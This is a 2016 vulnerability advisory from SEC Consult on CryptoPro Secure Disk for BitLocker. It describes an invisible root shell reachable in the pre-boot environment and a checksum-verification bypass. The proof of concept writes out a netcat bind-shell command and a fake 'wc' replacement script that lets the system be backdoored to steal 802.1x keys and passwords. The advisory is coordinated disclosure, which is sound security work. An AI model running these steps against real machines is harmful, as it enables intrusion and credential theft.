SEC Consult Vulnerability Lab Security Advisory < 20160831-0 >
=======================================================================
              title: Manipulation of pre-boot authentication
            product: CryptWare CryptoPro Secure Disk for Bitlocker
 vulnerable version: 5.1.0.6474
      fixed version: 5.2.1
         CVE number: -
             impact: critical
           homepage: http://www.cryptware.eu
              found: 2016-06-30
                 by: R. Freingruber (Office Vienna)
                     M. von Dach (Office Zurich)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"CryptoPro Secure Disk for BitLocker enhances the functionality of
Microsoft BitLocker to have an own PreBoot Authentification (PBA)
and enables BitLocker to use established and existing authentication
methods like UID/Password and Smartcard/PIN. The encryption
of the hard disk, as well as the recovery mechanism are realized with
Microsoft BitLocker while the user Authentication and Help-Desk
mechanism are handled by CryptoPro Secure Disk for Bitlocker.

This ideal combination of both technologies allows customers to
establish an ease of use and cost effective solution, even without
have to use TPM authentication and administration. Our centralized
encryption management with different roles of administration and
multi-client-capability delivers new opportunities for customers and
third party service providers."

Source:
http://files.cryptware.eu/200000369-9fec6a1e00/CryptWare_Datenblatt_Secure_Disk_for_BitLocker_EN.pdf


Business recommendation:
------------------------
By using the vulnerabilities documented in this advisory an attacker
can attack the boot process and backdoor the system to steal
login credentials, the private 802.1x certificate and the associated
password.

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Terminal access not blocked at login mask
After installing CryptoPro Secure Disk an additional partition (ext3) is
added to the system. This partition contains a small linux operating system
and gets directly started after booting the system (before bitlocker code
gets executed). Via an init script the login application is started.
An attacker can use a keyboard shortcut to open the first terminal.
This spawns an invisible root shell for the attacker (commands can be
executed, however, the output is not directly visible).
The other terminals (terminal two to six) are blocked via commands
inside the /etc/inittab file. The associated line for terminal one is
uncommented and therefore not active.


2) Inadequate software manipulation verification
After starting the system the following application gets started:
/usr/SUPERSHEEP/bin/app_launcher -a ./ss_gui
The app_launcher application carries out checks and finally
starts the graphical user interface with the login mask (ss_gui).
These checks first verify the hashsum of the file
/usr/SUPERSHEEP/bin/verify_checksums.sh
and afterwards execute the script. The script calculates the hashsum
of nearly all files on the system and compares them with a preconfigured
list (which is stored inside an encrypted block special file).
If the hash of the script is wrong or the script reports invalid hashes,
the boot process is stopped and an error is displayed to the user.
The script contains a design / logical error which allows an attacker
to bypass the hash verification. By exploiting this flaw an attacker
can modify all files on the system (e.g. add a backdoor).


Proof of concept:
-----------------
1) Terminal access not blocked at login mask
An attacker can use the keyboard shortcut ctrl+alt+f1 to open an
invisible root shell. A simple proof-of-concept is to type the
command "reboot". This results in a beep-sound and a reboot of the
system.
Another proof-of-concept is that an attacker connects the victim
system with a DHCP server to assign an IP address and then start the
following command:
/usr/bin/netcat -lvvp 8197 -e /bin/sh

This command must be typed with a german keyboard layout. It
binds a root shell to the port 8197. Afterwards the attacker can
connect to port 8197 to issue commands and receive the output of it.


2) Inadequate software manipulation verification
The script /usr/SUPERSHEEP/bin/verify_checksums.sh
executes the following command to calculate the number of files with
invalid hashes:
/tmp/sha256sum -c $CS_FILE > $CS_FILE.out
Later the wc (word count) utility is used to count the number of
errors. This is done by the following code:
NUM_FAILED=`wc -l $CS_FILE.error | cut -d " " -f 1`
The script uses the wc program and expects that wc was not
modified and the output of it is correct. However, an attacker
can modify it to always return zero which means that zero errors
where found.
The problem is that the script verify_checksums.sh verifies the
hashsum of the wc utility but during verification it already uses
this utilitiy for this verification check.

For a proof-of-concept the wc file was replaced with the following content:
#!/bin/sh
echo a0 xa
exit 0

After that all scripts and binaries can be modified.
For example, the following script from CryptoPro Secure Disk can be used to
backdoor the system to save private keys (802.1x) together with the
associated password:
/usr/SUPERSHEEP/extract_certificates.sh


Vulnerable / tested versions:
-----------------------------
The version 5.1.0.6474 was found to be vulnerable which was the latest version
at the time of discovery.


Vendor contact timeline:
------------------------
2016-08-01: Contacting vendor through support@cryptware.eu
2016-08-02: CryptWare was able to reproduce the vulnerabilities
2016-08-10: Release of CryptoPro Secure Disk 5.2.1 which
            according to the vendor fixes the vulnerabilities.
2016-08-31: Coordinated release of security advisory


Solution:
---------
Upgrade to CryptoPro Secure Disk 5.2.1. The patch is provided
by the vendor directly.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF R. Freingruber / @2016